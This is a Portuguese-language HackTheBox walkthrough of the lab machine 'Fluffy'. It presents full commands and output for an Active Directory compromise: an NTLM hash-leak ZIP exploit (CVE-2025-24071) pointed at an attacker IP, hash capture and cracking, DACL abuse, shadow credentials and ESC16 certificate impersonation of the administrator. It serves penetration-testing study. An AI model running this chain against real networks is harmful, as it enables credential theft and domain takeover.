Author: NullbyteDate: 2025-07-12
Fluffy é uma máquina do HackTheBox que ataca os princípios de uma rede corporativa, explorando cada detalhe de vulnerabilidade, cada byte, cada bit.
Let's hack!
Credenciais:
As is common in real life Windows pentests, you will start the Fluffy box with credentials for the following account: j.fleischman / J0elTHEM4n1990!
Recon
┌──(root㉿kali)-[/tmp]
└─# scan fluffy.htb
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan
[~] The config file is expected to be at "/root/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.129.85.197:53
Open 10.129.85.197:88
Open 10.129.85.197:139
Open 10.129.85.197:389
Open 10.129.85.197:445
Open 10.129.85.197:464
Open 10.129.85.197:593
Open 10.129.85.197:636
Open 10.129.85.197:3269
Open 10.129.85.197:3268
Open 10.129.85.197:5985
Open 10.129.85.197:9389
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-07-30 03:02:41Z)
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:, DNS:DC01.fluffy.htb
| Issuer: commonName=fluffy-DC01-CA/domainComponent=fluffy
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-04-17T16:04:17
| Not valid after: 2026-04-17T16:04:17
| MD5: 2765:a68f:4883:dc6d:0969:5d0d:3666:c880
| SHA-1: 72f3:1d5f:e6f3:b8ab:6b0e:dd77:5414:0d0c:abfe:e681
| -----BEGIN CERTIFICATE-----
| MIIGJzCCBQ+gAwIBAgITUAAAAAJKRwEaLBjVaAAAAAAAAjANBgkqhkiG9w0BAQsF[...]
|_ssl-date: 2025-07-30T03:04:18+00:00; +7h00m00s from scanner time.
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-07-30T03:04:16+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:, DNS:DC01.fluffy.htb
| Issuer: commonName=fluffy-DC01-CA/domainComponent=fluffy
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-04-17T16:04:17
| Not valid after: 2026-04-17T16:04:17
| MD5: 2765:a68f:4883:dc6d:0969:5d0d:3666:c880
| SHA-1: 72f3:1d5f:e6f3:b8ab:6b0e:dd77:5414:0d0c:abfe:e681
| -----BEGIN CERTIFICATE-----
| MIIGJzCCBQ+gAwIBAgITUAAAAAJKRwEaLBjVaAAAAAAAAjANBgkqhkiG9w0BAQsF[...]
|_-----END CERTIFICATE-----
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:, DNS:DC01.fluffy.htb
| Issuer: commonName=fluffy-DC01-CA/domainComponent=fluffy
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-04-17T16:04:17
| Not valid after: 2026-04-17T16:04:17
| MD5: 2765:a68f:4883:dc6d:0969:5d0d:3666:c880
| SHA-1: 72f3:1d5f:e6f3:b8ab:6b0e:dd77:5414:0d0c:abfe:e681
| -----BEGIN CERTIFICATE-----
| MIIGJzCCBQ+gAwIBAgITUAAAAAJKRwEaLBjVaAAAAAAAAjANBgkqhkiG9w0BAQsF[...]
|_-----END CERTIFICATE-----
|_ssl-date: 2025-07-30T03:04:18+00:00; +7h00m00s from scanner time.
3269/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-07-30T03:04:16+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:, DNS:DC01.fluffy.htb
| Issuer: commonName=fluffy-DC01-CA/domainComponent=fluffy
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-04-17T16:04:17
| Not valid after: 2026-04-17T16:04:17
| MD5: 2765:a68f:4883:dc6d:0969:5d0d:3666:c880
| SHA-1: 72f3:1d5f:e6f3:b8ab:6b0e:dd77:5414:0d0c:abfe:e681
| -----BEGIN CERTIFICATE-----
| MIIGJzCCBQ+gAwIBAgITUAAAAAJKRwEaLBjVaAAAAAAAAjANBgkqhkiG9w0BAQsF[...]
|_-----END CERTIFICATE-----
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49681/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49682/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49690/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49704/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49717/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019|10 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_10
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Windows Server 2019 (97%), Microsoft Windows 10 1903 - 21H1 (91%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.95%E=4%D=7/29%OT=53%CT=%CU=%PV=Y%DS=2%DC=T%G=N%TM=68892942%P=x86_64-pc-linux-gnu)
SEQ(SP=103%GCD=1%ISR=108%TI=I%II=I%SS=S%TS=U)
SEQ(SP=104%GCD=1%ISR=10D%TI=I%II=I%SS=S%TS=U)
OPS(O1=M552NW8NNS%O2=M552NW8NNS%O3=M552NW8%O4=M552NW8NNS%O5=M552NW8NNS%O6=M552NNS)
WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)
ECN(R=Y%DF=Y%TG=80%W=FFFF%O=M552NW8NNS%CC=Y%Q=)
T1(R=Y%DF=Y%TG=80%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=N)
U1(R=N)
IE(R=Y%DFI=N%TG=80%CD=Z)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 43914/tcp): CLEAN (Timeout)
| Check 2 (port 45400/tcp): CLEAN (Timeout)
| Check 3 (port 29708/udp): CLEAN (Timeout)
| Check 4 (port 37110/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-07-30T03:03:37
|_ start_date: N/A
|_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m59s
TRACEROUTE (using port 49690/tcp)
HOP RTT ADDRESS
1 144.00 ms 10.10.14.1 (10.10.14.1)
2 145.84 ms fluffy.htb (10.129.85.197)[0x0539] > Analisando, podemos
observar algumas portas que provavelmente serão muito
importantes: 445, 389,
88, 5985. Iniciaremos
analisando o serviço SMB
utilizado para compartilhamento de arquivos e até
mesmo execução de código remoto (dependendo do
usuário).
- Trick: usando
nxcpara enumerar o smb
┌──(root㉿kali)-[/tmp]
└─# nxc smb fluffy.htb -u 'j.fleischman' -p 'J0elTHEM4n1990!' --shares
SMB 10.129.85.197 445 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False)
SMB 10.129.85.197 445 DC01 [+] fluffy.htb\j.fleischman:J0elTHEM4n1990!
SMB 10.129.85.197 445 DC01 [*] Enumerated shares
SMB 10.129.85.197 445 DC01 Share Permissions Remark
SMB 10.129.85.197 445 DC01 ----- ----------- ------
SMB 10.129.85.197 445 DC01 ADMIN$ Remote Admin
SMB 10.129.85.197 445 DC01 C$ Default share
SMB 10.129.85.197 445 DC01 IPC$ READ Remote IPC
SMB 10.129.85.197 445 DC01 IT READ,WRITE
SMB 10.129.85.197 445 DC01 NETLOGON READ Logon server share
SMB 10.129.85.197 445 DC01 SYSVOL READ Logon server share┌──(root㉿kali)-[/tmp]
└─# smbclient //fluffy.htb/IT -U 'j.fleischman' -c 'ls'
Password for [WORKGROUP\j.fleischman]:
. D 0 Tue Jul 29 23:23:33 2025
.. D 0 Tue Jul 29 23:23:33 2025
Everything-1.4.1.1026.x64 D 0 Fri Apr 18 11:08:44 2025
Everything-1.4.1.1026.x64.zip A 1827464 Fri Apr 18 11:04:05 2025
KeePass-2.58 D 0 Fri Apr 18 11:08:38 2025
KeePass-2.58.zip A 3225346 Fri Apr 18 11:03:17 2025
Upgrade_Notice.pdf A 169963 Sat May 17 10:31:07 2025
5842943 blocks of size 4096. 1844516 blocks available┌──(root㉿kali)-[/tmp]
└─# smbclient //fluffy.htb/IT -U 'j.fleischman' -c 'ls;get Upgrade_Notice.pdf'
Password for [WORKGROUP\j.fleischman]:
. D 0 Tue Jul 29 23:23:33 2025
.. D 0 Tue Jul 29 23:23:33 2025
Everything-1.4.1.1026.x64 D 0 Fri Apr 18 11:08:44 2025
Everything-1.4.1.1026.x64.zip A 1827464 Fri Apr 18 11:04:05 2025
KeePass-2.58 D 0 Fri Apr 18 11:08:38 2025
KeePass-2.58.zip A 3225346 Fri Apr 18 11:03:17 2025
Upgrade_Notice.pdf A 169963 Sat May 17 10:31:07 2025
5842943 blocks of size 4096. 1880881 blocks available
getting file \Upgrade_Notice.pdf of size 169963 as Upgrade_Notice.pdf (148.2 KiloBytes/sec) (average 148.2 KiloBytes/sec)[0x0539] > Abrindo o
PDF podemos descobrir que alguma das
vulnerabilidades listadas está presente na rede. Nós
temos uma vulnerabilidade muito interessante; buscando
na internet achamos uma CVE que nos
permite ganhar algum acesso.
CVE-2025-24071 -> https://github.com/FOLKS-iwd/CVE-2025-24071-msfvenom
.7
.'/
/ /
/ /
/ /
/ /
/ /
/ /
/ /
/ /
__|/
,-\__\
|f-"Y\|
\()7L/
cgD __ _
|\( .' Y '>,
\ \ / _ _ \
\\\ )(_) (_)(|}
\\\ { 4A } /
\\\ \uLuJJ/\l
\\\ |3 p)/
\\\___ __________ /nnm_n//
c7___-__,__-)\,__)(". \_>-<_/D
//V \_"-._.__G G_c__.-__<"/ ( \
<"-._>__-,G_.___)\ \7\
("-.__.| \"<.__.-" ) \ \
|"-.__"\ |"-.__.-".\ \ \
("-.__"". \"-.__.-".| \_\
\"-.__""|!|"-.__.-".) \ \
"-.__""\_|"-.__.-"./ \ l
".__""">G>-.__.-"> .--,_
"" G-Exploitation Vulnerabilities-
[0x0539] > Executando os passos
para gerar a carga útil com
metasploit
msf6 auxiliary(server/ntlm_hash_leak) > options
Module options (auxiliary/server/ntlm_hash_leak):
Name Current Setting Required Description
---- --------------- -------- -----------
ATTACKER_IP yes The IP address to which the SMB request will be sent
FILENAME exploit.zip yes The name of the ZIP file to create
LIBRARY_NAME malicious.library-ms yes The name of the .library-ms file
SHARE_NAME shared yes The SMB share name to use in the .library-ms file
View the full module info with the info, or info -d command.
msf6 auxiliary(server/ntlm_hash_leak) > set ATTACKER_IP 10.10.14.184
ATTACKER_IP => 10.10.14.184
msf6 auxiliary(server/ntlm_hash_leak) > exploit
[*] Malicious ZIP file created: exploit.zip
[*] Host the file and wait for the victim to extract it.
[*] Ensure you have an SMB capture server running to collect NTLM hashes.
[*] Auxiliary module execution completed
msf6 auxiliary(server/ntlm_hash_leak) > pwd
[*] exec: pwd
/root/windows/ctf/fluffy/CVE-2025-24071-msfvenom[0x0539] > Fazendo o upload do
payload criado pelo metasploit
┌──(root㉿kali)-[~/windows/ctf/fluffy/CVE-2025-24071-msfvenom]
└─# ls
exploit.zip ntlm_hash_leak.rb README.md
┌──(root㉿kali)-[~/windows/ctf/fluffy/CVE-2025-24071-msfvenom]
└─# smbclient //fluffy.htb/IT -U 'j.fleischman'
Password for [WORKGROUP\j.fleischman]:
Try "help" to get a list of possible commands.
smb: \> put exploit.zip
putting file exploit.zip as \exploit.zip (0.8 kb/s) (average 0.8 kb/s)
smb: \>
[0x0539] > ""Sniffando"" a rede até
obter a hash do usuário p.agila
┌──(root㉿kali)-[/home/nullbyte]
└─# responder -I tun0
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.6.0
To support this project:
Github -> https://github.com/sponsors/lgandx
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.129.85.197
[SMB] NTLMv2-SSP Username : FLUFFY\p.agila
[SMB] NTLMv2-SSP Hash : p.agila::FLUFFY:HIDDEN[0x0539] > "Quebrando" a hash do
usuário p.agila
┌──(root㉿kali)-[~/windows/ctf/fluffy/CVE-2025-24071-msfvenom]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash_p.agila
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 3 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
prometheusx-303 (p.agila)
1g 0:00:00:10 DONE (2025-07-29 17:42) 0.09354g/s 422579p/s 422579c/s 422579C/s proquis..prom pics
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed. [0x0539] > Vendo quais permissões
tenho com o usuário p.agila
┌──(root㉿kali)-[~/windows/ctf/fluffy/CVE-2025-24071-msfvenom]
└─# bloodyAD --host 10.129.85.197 -d fluffy.htb -u 'p.agila' -p 'prometheusx-303' get writable
distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=fluffy,DC=htb
permission: WRITE
distinguishedName: CN=Prometheus Agila,CN=Users,DC=fluffy,DC=htb
permission: WRITE
distinguishedName: CN=Service Accounts,CN=Users,DC=fluffy,DC=htb
permission: CREATE_CHILD; WRITE
OWNER: WRITE
DACL: WRITE[0x0539] > O usuário
p.agila tem algumas permissões
importantes, como DACL,
OWNER.
[0x0539] > Podemos então tomar
controle do grupo e assim obter controle total dos
objetos do grupo, e sendo proprietário, obtemos
privilégio de todas as contas que pertencem a esse
grupo!
┌──(root㉿kali)-[~/windows/ctf/fluffy/CVE-2025-24071-msfvenom]
└─# bloodyAD --host 10.129.85.197 -d fluffy.htb -u 'p.agila' -p 'prometheusx-303' set owner "CN=Service Accounts,CN=Users,DC=fluffy,DC=htb" p.agila
[+] Old owner S-1-5-21-497550768-2797716248-2627064577-512 is now replaced by p.agila on CN=Service Accounts,CN=Users,DC=fluffy,DC=htb[0x0539] > adicionando permissão
geral sobre o grupo Service Accounts com
o usuário p.agila
┌──(root㉿kali)-[~/windows/ctf/fluffy/CVE-2025-24071-msfvenom]
└─# bloodyAD --host 10.129.85.197 -d fluffy.htb -u 'p.agila' -p 'prometheusx-303' add genericAll "CN=Service Accounts,CN=Users,DC=fluffy,DC=htb" p.agila
[+] p.agila has now GenericAll on CN=Service Accounts,CN=Users,DC=fluffy,DC=htb[0x0539] > adicionando o usuário
p.agila no grupo
Service Accounts
┌──(root㉿kali)-[~/windows/ctf/fluffy/CVE-2025-24071-msfvenom]
└─# bloodyAD --host 10.129.85.197 -d fluffy.htb -u 'p.agila' -p 'prometheusx-303' add groupMember "CN=Service Accounts,CN=Users,DC=fluffy,DC=htb" p.agila
[+] p.agila added to CN=Service Accounts,CN=Users,DC=fluffy,DC=htb[0x0539] > Identificando membros do
grupo Service Accounts.
┌──(root㉿kali)-[~/windows/ctf/fluffy/CVE-2025-24071-msfvenom]
└─# ldapsearch -x -H ldap://10.129.85.197 -D 'p.agila@fluffy.htb' -w 'prometheusx-303' -b "CN=Service Accounts,CN=Users,DC=fluffy,DC=htb" | grep member
member: CN=winrm service,CN=Users,DC=fluffy,DC=htb
member: CN=ldap service,CN=Users,DC=fluffy,DC=htb
member: CN=certificate authority service,CN=Users,DC=fluffy,DC=htb[0x0539] > Pelo que podemos ver,
temos 3 membros, e os membros têm nomes
de serviços. Dois deles são interessantes para nós:
winrm,
certificate authority.
[0x0539] > Lembram que temos
permissão de DACL? Podemos fazer um
ataque de shadow credential com essas contas
de serviço!
┌──(root㉿kali)-[~/windows/ctf/fluffy/CVE-2025-24071-msfvenom]
└─# pywhisker --dc-host 10.129.85.197 -d fluffy.htb -u p.agila -p 'prometheusx-303' /
-t winrm_svc -a add
[*] Searching for the target account
[*] Target user found: CN=winrm service,CN=Users,DC=fluffy,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: 27d0d9a6-ada7-3dda-2ac3-1cf08fd76e61
[*] Updating the msDS-KeyCredentialLink attribute of winrm_svc
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[*] Converting PEM -> PFX with cryptography: Qhe8WZes.pfx
[+] PFX exportiert nach: Qhe8WZes.pfx
[i] Passwort für PFX: 4xN1LvZWPxl2VRHyampW
[+] Saved PFX (#PKCS12) certificate & key at path: Qhe8WZes.pfx
[*] Must be used with password: 4xN1LvZWPxl2VRHyampW
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools[0x0539] > Após obter o
PFX — nesse caso vou fazer com a
winrm — podemos nos conectar por ela e
assim obter nossa flag user.txt!
Lembrando que os certificados no AD
são bastante importantes: se obtermos um certificado
de algum usuário, podemos obter a hash dele através de
um simples certificado!
┌──(root㉿kali)-[~/windows/ctf/fluffy/CVE-2025-24071-msfvenom]
└─# certipy auth -pfx Qhe8WZes.pfx -password "4xN1LvZWPxl2VRHyampW" -username 'winrm_svc' /
-dc-ip 10.129.85.197 -ns 10.129.85.197 -domain fluffy.htb -no-save
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] No identities found in this certificate
[!] Could not find identity in the provided certificate
[*] Using principal: 'winrm_svc@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Trying to retrieve NT hash for 'winrm_svc'
[*] Got hash for 'winrm_svc@fluffy.htb': [0x0539] > pegando a
Flag!
┌──(root㉿kali)-[~/windows/ctf/fluffy/CVE-2025-24071-msfvenom]
└─# evil-winrm -i 10.129.85.197 -u 'winrm_svc' -p 'hash ntlm'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\winrm_svc\Desktop> dir
Directory: C:\Users\winrm_svc\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 7/29/2025 8:00 PM 34 user.txt
*Evil-WinRM* PS C:\Users\winrm_svc\Desktop> type user.txt
0c169e83b26e682d HIDDEN HAHAHAHA
*Evil-WinRM* PS C:\Users\winrm_svc\Desktop> [0x0539] > Agora vamos ver a conta
de serviço certificate authority, e ver
quais permissões ela tem.
┌──(root㉿kali)-[~/windows/ctf/fluffy]
└─# certipy -debug account -username 'ca_svc' -hashes ':hash' /
-dc-ip 10.129.85.197 -ns 10.129.85.197 -target DC01.fluffy.htb -user 'ca_svc' read
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[+] Nameserver: '10.129.164.91'
[+] DC IP: '10.129.164.91'
[+] DC Host: 'DC01.fluffy.htb'
[+] Target IP: '10.129.164.91'
[+] Remote Name: 'DC01.fluffy.htb'
[+] Domain: ''
[+] Username: 'CA_SVC'
[+] Authenticating to LDAP server using NTLM authentication
[+] Using NTLM signing: False (LDAP signing: True, SSL: True)
[+] Using channel binding signing: True (LDAP channel binding: True, SSL: True)
[+] Using LDAP channel binding for NTLM authentication
[+] LDAP NTLM authentication successful
[+] Bound to ldaps://10.129.164.91:636 - ssl
[+] Default path: DC=fluffy,DC=htb
[+] Configuration path: CN=Configuration,DC=fluffy,DC=htb
[*] Reading attributes for 'ca_svc':
cn : certificate authority service
distinguishedName : CN=certificate authority service,CN=Users,DC=fluffy,DC=htb
name : certificate authority service
objectSid : S-1-5-21-497550768-2797716248-2627064577-1103
sAMAccountName : ca_svc
servicePrincipalName : ADCS/ca.fluffy.htb
userPrincipalName : administrator
userAccountControl : 66048
whenCreated : 2025-04-17T16:07:50+00:00
whenChanged : 2025-08-01T21:53:02+00:00[0x0539] > Vamos gerar um ticket
TGT para conseguir logar na conta em
qualquer serviço :)
┌──(root㉿kali)-[~/windows/ctf/fluffy/CVE-2025-24071-msfvenom]
└─# python3 /root/windows/python3-impacket/examples/getTGT.py fluffy.htb/ca_svc /
-hashes 'hash ntml'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in ca_svc.ccache
┌──(root㉿kali)-[~/windows/ctf/fluffy/CVE-2025-24071-msfvenom]
└─# export KRB5CCNAME=ca_svc.ccache
┌──(root㉿kali)-[~/windows/ctf/fluffy/CVE-2025-24071-msfvenom]
└─# klist
Ticket cache: FILE:ca_svc.ccache
Default principal: ca_svc@FLUFFY.HTB
Valid starting Expires Service principal
07/30/2025 01:49:13 07/30/2025 11:49:13 krbtgt/FLUFFY.HTB@FLUFFY.HTB
renew until 07/31/2025 01:49:12[0x0539] > Verificando templates
vulneráveis — agora que temos acesso à conta
CA_SVC podemos explorar certificados!
Podemos ver que tem vulnerabilidade no certificado
chamada ESC16. Essa vulnerabilidade, de
forma resumida, permite gerar certificado se passando
por qualquer usuário alterando a UPN.
Vamos ao exemplo: somos o usuário
ca_svc, temos controle sobre o
ADCS. Vamos adicionar o UPN
do administrator à nossa conta
ca_svc — assim podemos solicitar
certificado no template user. Como o
UPN é do administrator, o
usuário ca_svc acaba se passando pelo
administrator e obtemos o
PFX do administrator. Segue
abaixo a cadeia de ataques.
Se tiver interessado em entender de forma
detalhada:
https://medium.com/@muneebnawaz3849/ad-cs-esc16-misconfiguration-and-exploitation-9264e022a8c6
┌──(root㉿kali)-[~/windows/ctf/fluffy/CVE-2025-24071-msfvenom]
└─# certipy find -username 'ca_svc' -k -dc-ip 10.129.85.197 -ns 10.129.85.197 -target DC01.fluffy.htb
Certificate Authorities
0
CA Name : fluffy-DC01-CA
DNS Name : DC01.fluffy.htb
Certificate Subject : CN=fluffy-DC01-CA, DC=fluffy, DC=htb
Certificate Serial Number : 3670C4A715B864BB497F7CD72119B6F5
Certificate Validity Start : 2025-04-17 16:00:16+00:00
Certificate Validity End : 3024-04-17 16:11:16+00:00
Web Enrollment
HTTP
Enabled : False
HTTPS
Enabled : False
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Active Policy : CertificateAuthority_MicrosoftDefault.Policy
Disabled Extensions : 1.3.6.1.4.1.311.25.2
Permissions
Owner : FLUFFY.HTB\Administrators
Access Rights
ManageCa : FLUFFY.HTB\Domain Admins
FLUFFY.HTB\Enterprise Admins
FLUFFY.HTB\Administrators
ManageCertificates : FLUFFY.HTB\Domain Admins
FLUFFY.HTB\Enterprise Admins
FLUFFY.HTB\Administrators
Enroll : FLUFFY.HTB\Cert Publishers
[!] Vulnerabilities
ESC16 : Security Extension is disabled.[0x0539] > Explorando o
ESC16, e mudando o UPN da
CA_SVC
┌──(root㉿kali)-[~/windows/ctf/fluffy]
└─# certipy -debug account -username 'ca_svc' -hashes ':hash' /
-dc-ip 10.129.85.197 -ns 10.129.85.197 -target DC01.fluffy.htb -upn 'administrator' /
-user 'ca_svc' update
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[+] Nameserver: '10.129.164.91'
[+] DC IP: '10.129.164.91'
[+] DC Host: 'DC01.fluffy.htb'
[+] Target IP: '10.129.164.91'
[+] Remote Name: 'DC01.fluffy.htb'
[+] Domain: ''
[+] Username: 'CA_SVC'
[+] Authenticating to LDAP server using NTLM authentication
[+] Using NTLM signing: False (LDAP signing: True, SSL: True)
[+] Using channel binding signing: True (LDAP channel binding: True, SSL: True)
[+] Using LDAP channel binding for NTLM authentication
[+] LDAP NTLM authentication successful
[+] Bound to ldaps://10.129.164.91:636 - ssl
[+] Default path: DC=fluffy,DC=htb
[+] Configuration path: CN=Configuration,DC=fluffy,DC=htb
[*] Updating user 'ca_svc':
userPrincipalName : administrator
[*] Successfully updated 'ca_svc'[0x0539] > confirmando se está
setado o UPN do administrator
┌──(root㉿kali)-[~/windows/ctf/fluffy]
└─# certipy -debug account -username 'ca_svc' -hashes ':hash' /
-dc-ip 10.129.85.197 -ns 10.129.85.197 -target DC01.fluffy.htb -user 'ca_svc' read
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[+] Nameserver: '10.129.164.91'
[+] DC IP: '10.129.164.91'
[+] DC Host: 'DC01.fluffy.htb'
[+] Target IP: '10.129.164.91'
[+] Remote Name: 'DC01.fluffy.htb'
[+] Domain: ''
[+] Username: 'CA_SVC'
[+] Authenticating to LDAP server using NTLM authentication
[+] Using NTLM signing: False (LDAP signing: True, SSL: True)
[+] Using channel binding signing: True (LDAP channel binding: True, SSL: True)
[+] Using LDAP channel binding for NTLM authentication
[+] LDAP NTLM authentication successful
[+] Bound to ldaps://10.129.164.91:636 - ssl
[+] Default path: DC=fluffy,DC=htb
[+] Configuration path: CN=Configuration,DC=fluffy,DC=htb
[*] Reading attributes for 'ca_svc':
cn : certificate authority service
distinguishedName : CN=certificate authority service,CN=Users,DC=fluffy,DC=htb
name : certificate authority service
objectSid : S-1-5-21-497550768-2797716248-2627064577-1103
sAMAccountName : ca_svc
servicePrincipalName : ADCS/ca.fluffy.htb
userPrincipalName : administrator
userAccountControl : 66048
whenCreated : 2025-04-17T16:07:50+00:00
whenChanged : 2025-08-01T21:53:02+00:00[0x0539] > obtendo o
PFX do administrator
┌──(root㉿kali)-[~/windows/ctf/fluffy]
└─# certipy -debug req -username 'administrator' -hashes ':hash' -dc-ip 10.129.85.197 -ns 10.129.85.197 -target DC01.fluffy.htb -ca 'fluffy-DC01-CA' -template 'User'
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[+] Nameserver: '10.129.164.91'
[+] DC IP: '10.129.164.91'
[+] DC Host: None
[+] Target IP: None
[+] Remote Name: 'DC01.fluffy.htb'
[+] Domain: ''
[+] Username: 'ADMINISTRATOR'
[+] Trying to resolve 'DC01.fluffy.htb' at '10.129.164.91'
[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Trying to connect to endpoint: ncacn_np:10.129.164.91[\pipe\cert]
[+] Connected to endpoint: ncacn_np:10.129.164.91[\pipe\cert]
[*] Request ID is 15
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrator.pfx'
[+] Attempting to write data to 'administrator.pfx'
[+] Data written to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'[0x0539] > Mudando o
UPN para os devidos usuários!
[0x0539] > Agora temos que nos
atentar a um detalhe importante para não ter conflito
na hora de autenticarmos com o certificado.
Temos que voltar o UPN da conta do
ca_svc para o ca_svc@fluffy.htb,
ou seja, o UPN dele.
Assim, o administrator vai ter o
UPN dele mesmo, no caso administrator@fluffy.htb,
e o ca_svc com o ca_svc@fluffy.htb.
┌──(root㉿kali)-[~/windows/ctf/fluffy]
└─# certipy -debug account -username 'ca_svc' -hashes ':hash' -dc-ip 10.129.164.91 -ns 10.129.164.91 /
-target DC01.fluffy.htb -upn 'ca_svc@fluffy.htb' -user 'ca_svc' update
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[+] Nameserver: '10.129.164.91'
[+] DC IP: '10.129.164.91'
[+] DC Host: 'DC01.fluffy.htb'
[+] Target IP: '10.129.164.91'
[+] Remote Name: 'DC01.fluffy.htb'
[+] Domain: ''
[+] Username: 'CA_SVC'
[+] Authenticating to LDAP server using NTLM authentication
[+] Using NTLM signing: False (LDAP signing: True, SSL: True)
[+] Using channel binding signing: True (LDAP channel binding: True, SSL: True)
[+] Using LDAP channel binding for NTLM authentication
[+] LDAP NTLM authentication successful
[+] Bound to ldaps://10.129.164.91:636 - ssl
